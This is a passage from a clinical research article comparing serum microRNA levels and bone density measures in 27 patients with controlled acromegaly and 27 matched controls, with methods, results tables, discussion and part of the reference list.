from each patient or subject after full explanation of the purpose and nature of all procedures used. This study was approved by the Ethical Committee of our institution (CEIC-IIB SantPau). Biochemical measurements Serum IGF1 concentrations were measured by an enzyme immunoassay (Mediagnost, Reutlingen/Germany) with a sensitivity of 0.09 ng/mL. The intra- and inter- assay coefficients of variation (CVs) were 6.7 and 6.8%, respectively. In the study, IGF-I is expressed as SD score (SDS). Growth hormone (GH), osteocalcin, carboxy- terminal collagen crosslinks (CTx) and total procollagen type 1 amino-terminal propeptide (P1NP) were measured by electrochemiluminescent immunoassay (cobas e601; Roche Diagnostics GmbHm). Imprecision for mean GH values between 0.18 and 35 μg/L was 3–3.4%, for osteocalcin concentrations between 6.11 and 160 μg/L was 2–2.3%, for β-crosslaps concentrations between 0.06 and 4.64 μg/L was 5.7–2.4% and for total P1NP values between 14.4 and 1090 μg/L was 3.7–3.4%. Sensitivity was 0.05 μg/L for GH, 0.5 μg/L for osteocalcin, 0.01 μg/L for CTx and 5 μg/L for P1NP. Serum 25-hydroxyvitamin D (vitamin D) concentrations were determined using an enzyme immunoassay (IDS, Boldon, UK), with a sensitivity of 4.8 ng/mL. Imprecision for mean vitamin D values between 12 and 77.9 ng/mL was 9.9–7.7%. Serum PTH concentrations were measured by electrochemiluminescent immunoassay (cobas e601; Roche Diagnostics GmbHm). Imprecision for mean PTH values between 23.2 and 184 pg/mL was 3.4–1.7%. Serum osteoprotegerin (OPG) concentrations were measured by an enzyme-linked immune-sorbent assay (Abcam), with a sensitivity <1 pg/mL and range between 1.23 and 900 pg/mL. Both serum Dickkopf-related protein 1 (DKK1) and sclerostin (SOST) concentrations were measured using an enzyme immunoassay (Biomedica, Vienna, Austria). Both intra- and inter-assay CVs for DKK1 were 3% and the sensitivity was 1.7 pmol/L. Intra- and inter- assay CVs for SOST were <7 and <10%, respectively; sensitivity was 3.2 pmol/L. Serum osteoprotegerin concentrations were measured using an enzyme- linked immune-sorbent assay (Biomedica). Intra- and interassay CVs were <3 and <5%, respectively; sensitivity was 0.07 pmol/L. Radiological imaging Areal BMD (aBMD) was measured by dual-energy X-ray absorptiometry scanning (Hologic Discovery DXA system, HOLOGIC, Bedford, MA, USA). The CV was 1%. Patients had the lumbar spine and femoral neck scanned. The scan acquisition and analysis were performed by a certified and experimented technician and were performed according to the ISCD standards. (http://www. iscd.org/documents/2015/06/2015-iscd-adult-official- positions.pdf). Trabecular bone score was acquired from the lumbar spine DXA image automatically by the TBS iNsight software, Medimaps Group SA, Geneva, Switzerland. This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access http://www.iscd.org/documents/2015/06/2015-iscd-adult-official-positions.pdf http://www.iscd.org/documents/2015/06/2015-iscd-adult-official-positions.pdf http://www.iscd.org/documents/2015/06/2015-iscd-adult-official-positions.pdf https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com E Valassi et al. miRNAs and bone in acromegaly 42 PB–11 8:1 Quantitative computed tomography (QCT) was performed using a Phillips Brilliance 16 scanner. Participants were positioned supine on the scanner table, lying on top of a solid calibration phantom which covered levels L2–L4 (Mindways Software, Inc. Austin, TX, USA). Spine volumetric BMD was calculated as the mean of the values at L2, L3 and L4 (expressed as LS vBMD). To measure femoral vBMD, all the scans were acquired from the acetabulum directly above the femoral head down to 1 cm below the lesser trochanter, resulting in 25–35 slices, with 3 mm slice thickness, over a range of 8–12 cm. All scans were performed at 120 kV and 70 to 200 mAs depending on height and weight of the patient, according to the Mindways technical specifications. The images were processed and analyzed using QCT-pro Software version 4.1.3 and the QCT-pro Bone Investigational Toolkit Version 2.0 (BIT, Mindways Software, Inc.) by the same physician (JM). Volumetric BMD was obtained from the hip QCT analysis performing the following automated steps: (a) extraction of the proximal femur and (b) rotation and segmentation of bone voxels from soft tissue in three planes (axial, sagittal and coronal). For each scan at each time point, a fixed threshold (450 mg/cm3) was used to discriminate cortical from trabecular compartment (26). Mechanical properties were obtained using the BIT software. A sliced narrow neck (NN) analysis was performed and the mechanical properties (buckling ratio (BR), cross-sectional area (CSA; cm2) and average cortical thickness (ACT, cm)) were the mean value of the NN series results. NN consists of nine slices of the femoral neck; the average of the slice structural results was used to perform the analysis. miRNA isolation from serum samples RNA extraction was conducted at Exiqon Services, Denmark. Serum samples were centrifuged at 3000 g for 5 min at 4°C. An aliquot of 200 μL per sample was transferred to a FluidX tube and 60 μL of Lysis solution BF containing 1 μg carrier-RNA per 60 μL Lysis Solution BF and RNA spike-in template mixture was added to the sample and mixed for 1 min and incubated for 7 min at room temperature, followed by addition of 20 μL Protein Precipitation solution BF. Total RNA was extracted from the samples using miRCURY RNA isolation kit – Biofluids; high-throughput bead-based protocol v.1 (Exiqon, Vedbaek, Denmark) in an automated 96-well format. The purified total RNA was eluted in a final volume of 50 μL. The RNA was stored in a −80°C freezer. miRNA selection Since very little information on miRNAs in GH excess is available, the selection of miRNAs to be measured in this study was based on previously published data evaluating the relationship between miRNAs and bone phenotypes (19, 21, 27, 28). miR-99a-5p, miR-125a-5p, miR-885-5p, miR-324-5p, miR-335-3p, miR-7-1-3p, miR-22-3p, miR-660-5p and miR-10b-5p were selected based on a preliminary screening, which was performed in six patients and six controls using miRCURY LNATM Universal RT microRNA PCR Serum/Plasma Focus panel (Exiqon) (Supplementary Table 1, see section on supplementary data given at the end of this article). miR-451a and miR-23a-3p were included for hemolysis assessment of samples. MicroRNA real-time qPCR miRNA qPCR and further data analyses were conducted at Exiqon Services, Denmark. Using the miRCURY LNA Universal RT microRNA PCR, Polyadenylation and cDNA synthesis kit (Exiqon), 2 μL RNA was reverse transcribed in 10 μL reactions. Then, cDNA was diluted 50× and assayed in 10 μL PCR reactions according to the protocol for miRCURY LNA Universal RT microRNA PCR; each microRNA was assayed once by qPCR on the microRNA Ready-to-Use PCR, Custom Pick and Mix panel using ExiLENT SYBR Green master mix. Negative controls excluding template from the reverse transcription reaction was performed and profiled like the samples. The amplification was performed in a LightCycler 480 Real-Time PCR System (Roche) in 384- well plates. The amplification curves were analyzed using the Roche LC software, both for determination of Cq (by the 2nd derivative method) and for melting curve analysis. The amplification efficiency was calculated using algorithms similar to the LinReg software. All assays were inspected for distinct melting curves and the Tm was checked to be within known specifications for the assay. Furthermore, assays must be detected with five Cqs less than the negative control, and with Cq <37 to be included in the data analysis. Data that did not pass these criteria were omitted from any further analysis. Cq was calculated as the 2nd derivative. Using NormFinder the best normalizer was found to be the average of assays detected in all samples. All data were normalized to the average of assays detected in all samples (average–assay Cq). Data quality control, unsupervised This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com E Valassi et al. miRNAs and bone in acromegaly 438:1 data analysis and Student t-test with Benjamini–Hochberg correction were performed (corrected P values <0.05 were accepted as significant). Hemolysis assessment MicroRNA contamination from hemolysis (29) was assessed using miR-451 (expressed in red blood cells) and the miRNA relatively stable in serum, miR-23a. The ratio between these two microRNAs correlates to degree of hemolysis. Samples with ratios above 7.0 are considered as affected by hemolysis. Statistical analysis The data are expressed as the mean ± s.d., except for data that were not normally distributed, in which case median values and ranges are reported. Comparisons between two groups were performed using Student’s t (Gaussian distribution) and Mann–Whitney’s U (non-Gaussian distribution) tests, depending on the data distribution. Correlations were assessed using the Pearson’s correlation coefficient or Spearman rank order depending on whether the data were normally distributed. Correlations were adjusted for age, sex, BMI and gonadal status by a stepwise multiple linear regression analysis. Tests were two-tailed, and a P < 0.05 was considered significant. Results Clinical characteristics and bone parameters The characteristics of the study population are shown in Table 1. Volumetric bone mineral density at lumbar spine (LSvBMD), as assessed by QCT, was lower in ACRO patients as compared with healthy controls (106 ± 39 vs 129 ± 30 mg/cm3; P = 0.040). A reduction of cortical vBMD was also found in ACRO patients as compared with controls at the level of the total hip (831 ± 57 vs 883 ± 65 mg/cm3; P = 0.014), femoral neck (817 ± 90 vs 902 ± 159 mg/cm3; P = 0.037) and trochanter (742 (86) vs 848 (204) mg/cm3; P = 0.006). CSA at the proximal femur was greater in ACRO than controls (9.9 ± 2 vs 8 ± 2 cm2, P = 0.031). When postmenopausal women were ruled out from the analysis, cortical vBMD at total hip and trochanter were still reduced in ACRO patients as compared with their healthy, eugonadal counterpart (total hip, 125 ± 17 vs 142 ± 25 mg/cm3, P = 0.005; trochanter, 727 (87) vs 809 (228) mg/cm3; P = 0.012). When only postmenopausal women were compared, no differences in bone parameters were found. Osteoprotegerin and DKK1 levels were significantly higher in ACRO as compared with controls (4.6 ± 1.5 vs 3.9 ± 0.8 pmol/L, P = 0.047 for osteoprotegerin; 35 ± 15 pmol/L vs 25 ± 14 pmol/L, P = 0.011 for DKK1). Differentially expressed microRNAs ACRO vs controls The hemolysis assessment of the samples showed no sign of red blood cell contamination. When comparing the ACRO group to the control group, the following miRNAs were found to be differentially expressed: miR-103a-3p and miR-191-5p were overexpressed in ACRO patients, whereas miR 660-5p and miR-25-3p were underexpressed in ACRO patients. miR-25-3p did not pass the Benjamini– Hochberg correction (Table 2). Relationship between serum miRNAs and bone parameters Significant correlations between differentially expressed miRNAs and bone parameters in ACRO patients are shown in Table 3. miR-103a-3p levels were negatively associated with both trabecular vBMD at trochanter (r −0.38, P = 0.047) and serum OPG concentrations (r −0.41, P = 0.032). Levels of miR-103a-3p were also positively associated with vitamin D concentrations (r 0.54, P = 0.003) and total CSA (Spearman’s rho 0.43, P = 0.045). In contrast, levels of miR-660-5p were positively correlated with both trabecular vBMD at trochanter (r 0.38, P = 0.047) and OPG concentrations (r 0.47, P = 0.012), but were negatively associated with vitamin D levels (r −0.44, P = 0.022). Levels of miR-25-3p were positively correlated with osteocalcin concentrations (r 0.38, P = 0.047). In controls (Table 4), miR-103a-3p levels were positively associated with CTx concentrations (r 0.45, P = 0.017) and TBS (r 0.51, P = 0.006), and miR-660-5p levels were negatively associated with TBS (r −0.43, P = 0.023). Levels of miR-25-3p were negatively associated with lumbar spine aBMD (r −0.43, P = 0.030). No correlations were detected between miR-191-5p and bone parameters. miR-103-a-3p was negatively associated with miR-660-5p in both ACRO patients (r −0.86, P < 0.001) This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com E Valassi et al. miRNAs and bone in acromegaly 44 PB–11 8:1 and controls (r −0.70, P < 0.001). In controls only, miR-191-5p was negatively associated with miR-25-3p (r −0.80, P < 0.001). No correlations were found between any of the miRNAs analyzed and the duration of either active or controlled disease. Discussion We have demonstrated that levels of circulating miR-103-a-3p, miR-660-5p and miR-191-5p are differentially expressed in serum of patients with controlled acromegaly (ACRO) as compared with Table 1 General, biochemical and bone characteristics of 27 patients with controlled acromegaly (ACRO) and 27 healthy controls. ACRO (n = 27) Controls (n = 27) P valuea Age (years) 48 ± 5 50 ± 8 0.57 Males/females 11/16 11/16 BMI (kg/m2) 28 ± 4 27 ± 5 0.87 GH (µg/L) 1.3 ± 1.5 1.4 ± 2 0.89 IGF1 (ng/mL) 177 ± 68 148 ± 33 0.13 IGF1SDS 0.9 ± 1 0.3 ± 0.7 0.10 Bone markers Serum calcium (mg/dL) 9.6 ± 0.5 9 ± 1.6 0.25 25(OH)D (ng/mL) 66 ± 27 64 ± 35 0.79 Serum PTH (pg/mL) 38 ± 19 36 ± 12 0.88 Osteocalcin (ng/mL) 17 ± 8 19 ± 6 0.42 Total P1NP (ng/mL) 45 ± 22 54 ± 23 0.17 CTx (ng/mL) 0.35 ± 0.18 0.39 ± 0.18 0.51 Osteoprotegerin (pmol/L) 4.6 ± 1.5 3.9 ± 0.8 0.047 DKK1 (pmol/L) 35 ± 15 25 ± 14 0.011 SOST (pmol/L) 39 ± 6 38 ± 5 0.92 DXA parameters Lumbar T-score −1.2 ± 1.1 −0.8 ± 1.3 0.30 Lumbar BMD 0.91 ± 0.13 0.94 ± 0.12 0.54 Femur T-score −0.6 ± 0.98 −0.36 ± 1 0.39 Femoral neck aBMD 0.90 ± 0.13 0.94 ± 0.14 0.39 Total hip aBMD 0.81 ± 0.11 0.81 ± 0.12 0.97 TBS 1.26 ± 0.13 1.3 ± 0.14 0.14 QCT parameters Lumbar spine-vBMD 106 ± 39 129 ± 30 0.040 Total hip-vBMD Trabecular 128 ± 21 141 ± 24 0.095 Cortical 831 ± 57 883 ± 65 0.014 Femoral neck-vBMD Trabecular 132 ± 28 147 ± 27 0.11 Cortical 817 ± 90 902 ± 159 0.037 Trochanteric-vBMD Trabecular 128 ± 19 137 ± 20 0.85 Cortical 742 (86) 848 (204) 0.006 Intertrochanteric-vBMD Trabecular 127 ± 25 143 ± 28 0.074 Cortical 855 ± 62 882 ± 38 0.34 Biomechanical parameters CSA total 9.9 ± 2 8 ± 2 0.031 ACT 0.34 ± 0.06 0.32 ± 0.88 0.29 BR 5.2 ± 0.9 5.4 ± 2 0.59 aStudent’s t-test comparing patients with acromegaly vs healthy controls. 25(OH)D, 25-hydroxyvitamin D; ACT (average cortical thickness) is expressed as cm; BMI, body mass index; BR, buckling ratio is unitless; CSA, cross-sectional area is expressed as cm2; variables are expressed as mean (±s.d.) or median (interquartile range) depending upon the distribution; CTx, carboxy-terminal collagen crosslinks; DKK1, Dickkopf-related protein 1; DXA, dual-energy X-ray absorptiometry; IGF-1, insulin-like growth factor-I; P1NP, type 1 amino-terminal propeptide; PTH, parathyroid hormone; QCT, quantitative computed tomography; SOST, sclerostin; TBS, trabecular bone score; vBMD, (volumetric bone mineral density) is expressed as mg/cm3. Statistically significant differences (P<0.05) are marked in bold. This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com E Valassi et al. miRNAs and bone in acromegaly 458:1 age-, sex- and BMI-matched controls. Moreover, we have found independent relationships between parameters of bone status and both miR-103a-3p and miR-660-5p levels that are exclusive for ACRO patients. As a matter of fact, patients with active ACRO present with a disproportionate increase in bone turnover, especially resorption, reduced spine and femoral vBMD at both trabecular and cortical compartment, altered trabecular microstructure and elevated fracture risk at lumbar spine (6, 7, 8, 30). After remission of chronic GH/IGF-I increase, patients with controlled ACRO maintain long-lasting impairment of trabecular microarchitecture, which is associated with persistently increased risk of vertebral fractures regardless of aBMD (6, 7, 8). Interestingly, recent evidence suggests that the cortical compartment is also affected in ACRO patients with fragility vertebral fractures even long term after biochemical control (7, 9, 31, 32). Mechanisms underlying the detrimental effects of GH/IGF-I excess on bone structure are multifactorial and still to be entirely elucidated (1). The interaction of GH/IGF-I with the RANK-L/OPG system may play a role in the regulation of bone metabolism. In particular, it has been suggested that IGF-I may enhance osteoclastogenesis via stimulation of the RANK-L, whereas GH may attenuate this effect by inducing OPG synthesis (33). Of note, we have found that OPG levels are greater in controlled ACRO patients compared with those in Table 2 miRNA expression levels in 27 controlled ACRO patients and 27 sex-, age- and BMI-matched controls. miRNA ACRO Controls Fold change P value Q value hsa-miR-103a-3p 1.1 ± 0.003 0.007 ± 0.004 1.3 <0.001 0.013 hsa-miR-660-5p −2.8 ± 0.005 −2.2 ± 0.07 −1.47 <0.01 0.028 hsa-miR-191-5p −0.74 ± 0.002 −0.009 ± 0.003 1.17 <0.01 0.044 hsa-miR-25-3p 0.21 ± 0.006 0.006 ± 0.007 −1.32 0.041 0.18 hsa-miR-320a 1.02 ± 0.004 1.3 ± 0.007 −1.21 0.085 0.27 hsa-miR-21-5p 2.64 ± 0.002 2.82 ± 0.004 −1.13 0.088 0.27 hsa-miR-29b-3p −4.69 ± 0.006 −0.43 ± 0.007 −1.24 0.099 0.27 hsa-miR-125a-5p −0.26 ± 0.005 −2.87 ± 0.005 1.19 0.12 0.30 hsa-miR-22-3p −0.21 ± 0.006 −1.88 ± 0.008 −1.2 0.17 0.35 hsa-miR-324-5p −0.44 ± 0.008 −4.77 ± 0.008 1.23 0.17 0.35 hsa-miR-29a-3p −2.65 ± 0.006 −2.43 ± 0.007 −1.16 0.23 0.43 hsa-miR-122-5p −1.88 ± 1.02 −0.15 ± 0.13 −0.12 0.25 0.44 hsa-miR-335-3p −7.2 ± 0.009 −0.06 ± 0.009 −0.11 0.39 0.60 hsa-miR-885-5p −0.6 ± 1.1 −6 ± 1.12 −1.19 0.41 0.60 hsa-miR-382-3p −7.3 ± 0.13 −0.79 ± 1.76 0.15 0.47 0.61 hsa-miR-125b-5p −4.1 ± 0.006 −4 ± 0.007 −1.07 0.58 0.71 hsa-miR-10b-5p −3.22 ± 0.006 −3 ± 0.008 −1.07 0.61 0.71 hsa-miR-7-1-3p −0.57 ± 0.007 −5.79 ± 1.12 1.06 0.74 0.79 hsa-miR-99a-5p −4.34 ± 0.008 −4.27 ± 0.008 −1.05 0.75 0.79 hsa-miR-223-3p 4.81 ± 0.004 −4.79 ± 0.006 1 0.93 0.93 Bold values indicate the miRNAs that passed the false-discovery rate (FDR) for multiple comparisons (Q value <0.05). Values shown are those with a nominal P value <0.05 which was obtained using Student’s t-test paired with data normalized by log2 transformation. Q values were calculated as estimates of the multiple-testing FDR. ACRO, acromegaly; miRNA, microRNA. Table 3 Correlations between miRNA expression and bone markers or bone parameters as assessed by dual-energy absorptiometry (DXA) and quantitative computed tomography (QCT) in 27 patients with acromegaly, after adjusting for age, sex, BMI and gonadal status. hsa-miR-103a-3p hsa-miR-660-5p hsa-miR-25-3p 25(OH)D (ng/mL) r 0.54; P = 0.003 r −0.44; P = 0.022 Osteocalcin (ng/mL) r 0.38; P = 0.047 CTx (ng/mL) OPG (pmol/L) r −0.41; P = 0.032 r 0.47; P = 0.012 Trochanteric trabecular vBMD r −0.38; P = 0.047 r 0.38; P = 0.047 Total CSA (cm2) ρ 0.43; P = 0.045 25(OH)D, 25-hydroxyvitaminD; BMD, bone mineral density; CSA, cross-sectional area; CTx, carboxy-terminal collagen crosslinks; OPG, osteoprotegerin; P1NP, total procollagen type 1 amino-terminal propetide; TBS, trabecular bone score; vBMD, volumetric bone mineral density. This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com E Valassi et al. miRNAs and bone in acromegaly 46 PB–11 8:1 healthy subjects, as a possible compensatory mechanism, which counteracts increased bone resorption. Constantin et al. reported no change in the RANK-L/OPG ratio after surgical control of ACRO as compared with baseline, suggesting sustained perturbations of this system despite hormone normalization (34). Inour study, miR-103a-3p, upregulated in ACRO, was negatively associated with OPG and trabecular vBMD at the trochanter. It has been recently found that miR-103a, which is expressed in both osteoblasts and osteoclasts of postmenopausal women, negatively regulates osteoblast differentiation and bone formation under mechanical loading, by repressing the expression of RUNX2, a key transcriptional factor for osteogenesis (27, 35). Valenti et al. described a RUNX2 overexpression in MSCs during both the active and controlled phase of the disease, which was also associated with bone quality impairment, as assessed through histomorphometric analyses (36). As a matter of fact, both RUNX2 deletion and overexpression led to impaired bone formation (37, 38). However, Belaya et al. reported unchanged expression of RUNX2 in bone samples of active ACRO patients, whereas no studies have been published thus far on controlled ACRO patients (22). It could be speculated that, in controlled patients, miR-103a participates in this complex network of signals modulating both osteoclastogenesis and osteoblastogenesis, also through the regulation of the RANK-L/OPG system. In contrast with miR-103a-3p, the miR-660-5p, downregulated in ACRO patients, positively correlated with both trabecular vBMD at trochanter and OPG. As far as we know, there is no information about the miR- 660-5p’s role in bone tissue, and the present study shows, for the first time, an association between this miRNA and bone. miR-103a-3p and miR-660-5p appear to have an opposite relationship with parameters of bone metabolism, including vitamin D. While 1,25 (OH)2D levels have been described as normal or high during the active phase of the disease, its levels, as well as those of 25(OH)D, did not change after control of GH/IGF-I excess (34, 39, 40). Our results suggest that miR-103a-3p and miR-660-5p could be potential markers of bone status and could predict the persistence of bone abnormalities in controlled ACRO patients. Noteworthy, these miRs were related to bone measurements even in healthy subjects. In particular, there was an opposite relationship between miR and TBS, while miR-103a-3p was positively associated with CTx, a marker of bone resorption. Such findings strengthen the hypothesis that miR-103a-3p and miR-660-5p play a physiological role in regulating bone homeostasis and, therefore, may represent potential signatures for bone deterioration under pathological conditions like GH/IGF-I excess. We have also found that miR-191-5p was upregulated in our patients. However, we did not detect any relationships between its levels and any of the bone parameters we measured. We are not aware of any putative role of this miRNAs in bone regulation and, therefore, we hypothesize that this finding may be independent of skeletal health. As we previously described, DKK1 levels were higher in ACRO patients as compared with controls, but no relationship was found between this Wnt signaling inhibitor and any of the miRNAs analyzed (41). Limitations of our study include small sample size and relative heterogeneity of our population. In particular, 19% of patients were in pharmacological remission and 26% received radiotherapy. It is currently not known whether pharmacological treatment of ACRO may cause independent skeletal actions on bone or interfere with miRNA expression (42). Nevertheless, none of the miRNAs described here have been reported as differentially expressed in GH-secreting pituitary adenomas from patients who are responders vs nonresponders to somatostatin analogs (28). Ten of our patients had also undergone radiotherapy previously, but Biermasz et al. demonstrated that previous pituitary irradiation was not associated with alteration of lumbar spine BMD in ACRO Table 4 Correlations between miRNA expression and bone markers or bone parameters (as assessed by DXA or QCT) in 27 healthy subjects after adjusting for sex, age, BMI and gonadal status. hsa-miR-103a-3p hsa-miR-660-5p hsa-miR-25-3p CTx (ng/mL) r 0.45; P = 0.017 Lumbar spine aBMD r −0.43; P = 0.030 TBS r 0.51; P = 0.006 r −0.43; P = 0.023 aBMD, areal bone mineral density; BMD, bone mineral density; CTx, carboxy-terminal collagen crosslinks; OPG, osteoprotegerin; SOST, sclerostin; TBS, trabecular bone score; vBMD, volumetric bone mineral density. This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com E Valassi et al. miRNAs and bone in acromegaly 478:1 patients in remission (43). Similarly, we could not assess the impact of comorbidities on miRNA expression in our patients. Another limitation of this study is its cross- sectional design, which prevents from inferring causality from our data. Lack of information on vertebral fractures as well as lack of a group with active acromegaly are the other limitations of this study. Since the source of the miRNAs in serum is currently unknown, we cannot exclude that alterations of miRNA expression may reflect specific actions in other tissues. miRNAs are ubiquitous modulators controlling multiple patterns of gene expression and, therefore, may play a pathogenic role in several tissues and/or may be markers of more than one ACRO-related complication. Indeed, ACRO is a multisystemic disease, which also seems to be associated with an elevated risk of malignancies (44). It is intriguing to speculate that miR- 103a-3p, miR-660-5p and miR-191-5p, which have been related to oncogenesis both in vitro and in vivo, may also be involved in the occurrence of tumors in ACRO patients (45, 46, 47, 48, 49, 50). Furthermore, associations of miRNAs and bone parameters remained significant after adjusting for the gonadal status, suggesting that previous exposure to GH/ IGF-I excess is the main determinant of bone impairment in patients with controlled ACRO, thus counteracting the negative effect of concomitant hypogonadism. Indeed, Madeira et al. found deteriorated trabecular microarchitecture at both the distal radius and distal tibia, as assessed by high-resolution peripheral QCT (HR-pQCT), in eugonadal patients with controlled ACRO, as compared with their hypogonadal counterpart (6). Similarly, Godang et al. showed that TBS was reduced in ACRO eugonadal men after 1 year of hormone excess correction, but not in hypogonadal subjects (39). Moreover, another study reported no associations between the gonadal status of controlled ACRO patients and trabecular vBMD measurements across the proximal femur and also showed that controlled ACRO with normal gonadal function had lower vBMD at both total hip and intertrochanter as compared with controls (8). In conclusion, we have described that some miRNAs are differentially expressed in the serum of ACRO patients as compared with controls and are associated with both biochemical and structural parameters of bone metabolism. In particular, our data, which need to be confirmed in larger studies, suggest that miR-103a-3p and miR-660-5p may be promising biomarkers to evaluate the presence of bone disease in GH/IGF-I excess and assess the persistence of bone impairment even after biochemical control has been reached. Supplementary data This is linked to the online version of the paper at https://doi.org/10.1530/ EC-18-0482. Declaration of interest The authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. Funding This work was supported by grants from the Instituto de Salud Carlos III (FIS PI14/00194 and PI17/00749), FEDER funds. Acknowledgement A special thanks to all the patients and controls who accepted to participate in this research. The authors are indebted to Ana Maria Marín and Eulalia Urgell for their technical assistance. References 1 Giustina A, Mazziotti G & Canalis E. Growth hormone, insulin-like growth factors, and the skeleton. Endocrine Reviews 2008 29 535–559. (https://doi.org/10.1210/er.2007-0036) 2 Olarescu NC, Berryman DE, Householder LA, Lubbers ER, List EO, Benencia F, Kopchick JJ & Bollerslev J. GH action influences adipogenesis of mouse adipose tissue-derived mesenchymal stem cells. Journal of Endocrinology 2015 226 13–23. (https://doi. org/10.1530/JOE-15-0012) 3 Ueland T, Olarescu NC, Jorgensen AP, Otterdal K, Aukrust P, Godang K, Levka T & Bollerslev J. Increased serum and bone matrix levels of the secreted Wnt antagonist DKK-1 in patients with growth hormone deficiency in response to growth hormone treatment. Journal of Clinical Endocrinology and Metabolism 2015 100 736–743. (https://doi. org/10.1210/jc.2014-2912) 4 Colao A, Ferone D, Marzullo P & Lombardi G. Systemic complications of acromegaly: epidemiology, pathogenesis and management. Endocrine Reviews 2004 25 102–152. (https://doi. org/10.1210/er.2002-0022) 5 Dekkers OM, Biermasz NR, Pereira AM, Romijn JA & Vandenbroucke JP. Mortality in acromegaly: a metaanalysis. Journal of Clinical Endocrinology and Metabolism 2008 93 61–67. (https://doi. org/10.1210/jc.2007-1191) 6 Madeira M, Neto LV, de Paula Paranhos Neto F, Barbosa Lima IC, Carvalho de Mendonça LM, Gadelha MR & Fleiuss de Farias ML. Acromegaly has a negative influence on trabecular bone, but not on cortical bone, as assessed by high-resolution peripheral quantitative computed tomography. Journal of Clinical Endocrinology and Metabolism 2013 98 1734–1741. (https://doi.org/10.1210/jc.2012- 4073) 7 Maffezzoni F, Maddalo M, Frara S, Mezzone M, Zorza I, Baruffaldi F, Doglietto F, Mazziotti G & Maroldi R. High-resolution beam tomography analysis of bone microarchitecture in patients with acromegaly and radiological vertebral fractures. Endocrine 2016 54 532–542. (https://doi.org/10.1007/s12020-016-1078-3) 8 Valassi E, Crespo I, Malouf J, Llauger J, Aulinas A, Marin AM, Biagetti B & Webb SM. Reduction of trabecular and cortical volumetric bone This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access https://doi.org/10.1530/EC-18-0482 https://doi.org/10.1530/EC-18-0482 https://doi.org/10.1210/er.2007-0036 https://doi.org/10.1530/JOE-15-0012 https://doi.org/10.1530/JOE-15-0012 https://doi.org/10.1210/jc.2014-2912 https://doi.org/10.1210/jc.2014-2912 https://doi.org/10.1210/er.2002-0022 https://doi.org/10.1210/er.2002-0022 https://doi.org/10.1210/jc.2007-1191 https://doi.org/10.1210/jc.2007-1191 https://doi.org/10.1210/jc.2012-4073 https://doi.org/10.1210/jc.2012-4073 https://doi.org/10.1007/s12020-016-1078-3 https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com E Valassi et al. miRNAs and bone in acromegaly 48 PB–11 8:1 mineral density at the proximal femur in patients with acromegaly. European Journal of Endocrinology 2016 174 107–114. (https://doi. org/10.1530/EJE-15-0931) 9 Malgo F, Hamdy NAT, Rebelink TJ, Kroon HM, Claessen KMJA, Pereira AM, Biermasz NR & Appelman-Dijkstra NM. Bone material strength index as measured by impact micriindentation is altered in patients with acromegaly. European Journal of Endocrinology 2017 176 339–347. (https://doi.org/10.1530/EJE-16-0808) 10 Kocijan R, Muschitz C, Geiger E, Skalicky S, Baierl A, Dormann R, Plachel F, Feichtinger X, Heimel P, Fahrleitner-Pammer A, et al. Circulating microRNA signatures in patients with idiopathic and postmenopausal osteoporosis and fagility fractures. Journal of Clinical Endocrinology and Metabolism 2016 101 4125–4134. (https://doi. org/10.1210/jc.2016-2365) 11 Hassan MQ, Tye CE, Stein GS & Lian JB. Non-coding RNAs : epigenetic regulators of bone development and homeostasis. Bone 2015 81 746–756. (https://doi.org/10.1016/j.bone.2015.05.026) 12 Turchinovich A, Weiz L & Burwinker B. Extracellular miRNAs: the mistery of their origin and function. Trends in Biochemical Sciences 2012 37 460–465. (https://doi.org/10.1016/j.tibs.2012.08.003) 13 Gordon JAR, Montecino MA, Aqueilan RI, Stein JL, Stein GS & Lian JB. Epigenetic pathways regulating bone homeostasis: potential targeting for intervention of skeletal disorders. Current Osteoporosis Reports 2014 12 496–506. (https://doi.org/10.1007/s11914-014- 